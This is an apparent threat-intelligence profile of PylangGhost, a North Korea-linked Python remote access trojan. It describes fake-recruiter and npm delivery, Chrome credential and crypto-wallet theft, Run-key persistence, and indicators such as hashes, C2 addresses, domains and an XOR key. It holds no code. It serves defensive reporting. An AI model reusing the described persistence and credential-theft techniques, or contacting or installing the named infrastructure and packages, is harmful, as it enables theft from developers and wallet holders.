PylangGhost

PylangGhost is a Python-based remote access trojan (RAT) associated with North Korean threat activity, most consistently attributed in the provided reporting to FAMOUS CHOLLIMA and also linked to the broader Contagious Interview / DeceptiveDevelopment ecosystem. It is described as a Python counterpart to GolangGhost, with both families sharing an identical or near-identical command structure and overlapping functionality. Reporting states that PylangGhost is primarily Windows-focused, while related GolangGhost variants emphasize broader multi-platform coverage; other reporting also describes PylangGhost and GolangGhost together as related multi-platform RATs.

Observed delivery vectors in the content include fake job interview and recruiter lures, ClickFix-style social engineering, malicious GitHub or coding-test projects, trojanized Node.js applications, and malicious npm packages. Public reporting cited here says PylangGhost was delivered through fake recruitment sites impersonating companies such as Coinbase and Robinhood, where victims were instructed to run PowerShell or curl commands that downloaded a ZIP archive. Another infection chain used a Visual Basic Script to launch a Python payload after a fake NVIDIA-related update lure. The malware was also observed on the npm registry for the first time in malicious packages including @jaime9008/math-service and react-refresh-update, and in a separate cluster of five npm packages abusing Cloudflare Pages and Workers: es6-runtimejs, winston-js-express, ether-bn.js, node-env-detector, and unique-string-64. Those npm campaigns used staged JavaScript loaders, environment profiling, sandbox checks, encrypted payloads, and runtime execution to evade detection.

Capabilities directly described in the content include remote system control, file manipulation, command execution, credential theft, cookie theft, and theft of browser extension data. Multiple reports state that PylangGhost steals Chrome credentials and cookies and can enumerate installed Chrome extension IDs. It is specifically described as engineered to defeat Google Chrome app-bound credential protection and to steal stored passwords and authentication cookies. Cisco Talos reporting cited in the content says it steals credentials from more than 80 browser extensions, including cryptocurrency wallets such as MetaMask, Phantom, and TronLink, and password managers such as 1Password and NordPass. Additional reporting says the GolangGhost/PylangGhost stealer module can gather Chrome extension data and includes functionality described as injecting a malicious MetaMask extension by modifying Chrome Secure Preferences and killing Chrome processes.

Persistence and execution details in the content include use of a VBS launcher and Windows registry Run-key persistence. One described package delivered a ZIP containing six Python modules, a VBS script, and a renamed Python interpreter disguised as nvidia.py; the VBS unpacked lib.zip and launched the RAT. Other reporting states that on Windows, PylangGhost/GolangGhost persistence uses HKCU\Software\Microsoft\Windows\CurrentVersion\Run to launch a VBS loader via wscript.exe. Runtime state was reported as stored in temporary-directory files such as .store and .host.

Command-and-control communications are described as HTTP POST based, with RC4-encrypted packets and MD5 checksums in some reporting. Observed user agents include python-requests. The content identifies several campaign-specific infrastructure elements and indicators. In the npm campaign involving @jaime9008/math-service and react-refresh-update, the loader used the hardcoded XOR key fdfdfdfdf3rykyjjgfkwi, the hardcoded campaign identifier ML2J, and infrastructure malicanbur[.]pro with C2 173.211.46.22:8080; the Windows payload hash was 0be2375362227f846c56c4de2db4d3113e197f0c605c297a7e0e0c154e94464e. In the Cloudflare Pages/Workers campaign, staged infrastructure included keo.pages.dev, dpw.jr12012025z.workers.dev, and deoft.org; the Windows payload SHA-256 was 9ec622624f5f07c5d86e6048f2710de1e9c5ac7c6a6fad4fcb31121bb67c0239, deoft.org resolved to 187.77.111.137, and config.py contained C2 address 187.127.248.20. Another sample associated with the recruitment-lure campaign is noted with hash c2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b.

Targeting described in the content centers on software developers, job seekers, cryptocurrency and blockchain professionals, Web3 personnel, and finance and technology sectors, with several reports highlighting victims in India and broader software supply-chain risk through compromised dependencies and CI/CD environments. The malware is repeatedly linked with DPRK financially motivated operations and with malware families including BeaverTail, InvisibleFerret, OtterCookie, FlexibleFerret, and GolangGhost.